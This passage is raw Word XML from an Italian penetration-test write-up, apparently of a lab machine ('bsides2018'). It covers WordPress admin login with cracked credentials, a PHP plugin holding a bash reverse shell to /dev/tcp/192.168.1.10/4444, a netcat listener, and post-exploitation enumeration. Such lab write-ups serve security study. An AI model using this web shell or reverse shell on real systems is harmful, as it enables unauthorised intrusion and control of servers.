        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:spacing w:after="160" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analisi e interpretazione dei risultati</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La catena di enumerazione ha evidenziato una serie di debolezze concatenate, ciascuna di per sé non critica ma che, combinate, hanno consentito di ricostruire un percorso di attacco completo: l'accesso FTP anonimo ha fornito un elenco di username plausibili; il file robots.txt ha rivelato un'installazione WordPress non collegata al sito principale e presumibilmente dimenticata ("backup_wordpress"); l'endpoint XML-RPC, tipicamente meno protetto da meccanismi anti-bruteforce rispetto al form di login standard, ha permesso di individuare una password debole ("enigma") per l'utente john, dotato di privilegi di amministratore sul CMS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:color="1f3864" w:space="0" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Fase 3: Ottenimento dell'Accesso Iniziale (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo della fase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sfruttare l'accesso amministrativo ottenuto al pannello WordPress per eseguire codice arbitrario sul server e ottenere una shell interattiva sulla macchina target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Strumenti utilizzati</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Pannello di amministrazione WordPress (wp-admin)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Web shell PHP personalizzata, distribuita come plugin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Netcat — listener per la ricezione della connessione di reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedura eseguita</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Con le credenziali john / enigma è stato effettuato l'accesso al pannello di amministrazione WordPress esposto all'indirizzo:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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9C">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">http://192.168.1.12/backup_wordpress/wp-admin/</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">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5334000" cy="3476625"/>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3340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60" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'accesso ha confermato il ruolo di Administrator per l'utenza compromessa, privilegio sufficiente per accedere alle funzionalità di gestione plugin e temi, che consentono l'esecuzione di codice PHP arbitrario sul server. È stato quindi predisposto un file PHP camuffato da plugin, contenente istruzioni per l'apertura di una reverse shell verso la macchina di attacco:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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9F">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">nano shell.php</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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A0">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;?php</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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> * Plugin Name: Shell</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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> * Description: Reverse shell</w:t>
            </w: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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> * Version: 1.0</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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> * Author: Test</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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">exec("/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.1.10/4444 0&gt;&amp;1'");</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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">?&gt;</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il file è stato quindi compresso in formato ZIP, formato richiesto dalla funzionalità di upload plugin di WordPress:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table16"/>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5"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="916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AB">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">zip shell.zip shell.php</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il pacchetto è stato caricato attraverso il percorso Plugin → Aggiungi nuovo → Carica plugin, quindi attivato dal pannello di amministrazione. In parallelo, sulla macchina di attacco è stato avviato un listener Netcat in ascolto sulla porta 4444:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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AD">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">nc -lvnp 4444</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Infine, il plugin è stato eseguito tramite richiesta diretta al relativo file all'interno della directory dei plugin:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table18"/>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5"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="901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AF">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">http://192.168.1.12/backup_wordpress/wp-content/plugins/shell/shell.php</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">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5334000" cy="3267075"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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340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60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risultati ottenuti</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La richiesta HTTP verso il file shell.php ha innescato l'esecuzione del comando di reverse shell, ricevuta correttamente dal listener Netcat in ascolto sulla macchina di attacco, con apertura di una sessione interattiva sul target con i privilegi dell'utente di sistema www-data (l'utente sotto cui gira il servizio Apache/PHP).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analisi e interpretazione dei risultati</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'ottenimento dell'accesso iniziale è stato reso possibile dalla combinazione di due debolezze: l'assenza di restrizioni sui tipi di plugin caricabili tramite l'interfaccia di amministrazione (che consente il caricamento di codice PHP arbitrario) e la compromissione preventiva di un'utenza con privilegi di Administrator. Va sottolineato che qualunque account con ruolo Administrator su un'installazione WordPress standard è, di fatto, equivalente a un'esecuzione di codice remoto (RCE) sul server sottostante, in quanto le funzionalità di gestione plugin/temi sono progettate per consentire modifiche dirette ai file eseguibili dell'applicazione.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:color="1f3864" w:space="0" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 Fase 4: Post-Exploitation ed Enumerazione del Sistema</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo della fase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Consolidare l'accesso ottenuto e raccogliere informazioni sul sistema (utenti, permessi, processi, attività pianificate) al fine di individuare un vettore utile per l'elevazione dei privilegi da www-data a root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Strumenti utilizzati</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Shell Bash interattiva ottenuta tramite reverse shell</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Comandi nativi Linux di enumerazione (whoami, id, uname, find, ps, crontab)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedura eseguita</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Una volta stabilita la connessione, è stata verificata l'identità dell'utenza corrente e le informazioni di base sul sistema:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">whoami</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># www-data</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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">id</w:t>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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># uid=33(www-data) gid=33(www-data) groups=33(www-data)</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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">pwd</w:t>
            </w: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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># /var/www/backup_wordpress</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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hostname</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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># bsides2018</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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">uname -a</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">È stato quindi enumerato l'elenco delle utenze di sistema dotate di una shell di login valida:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table20"/>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0"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="966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CB">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /etc/passwd | grep /bin/bash</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># root, abatchy, john, mai, anne, doomguy</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
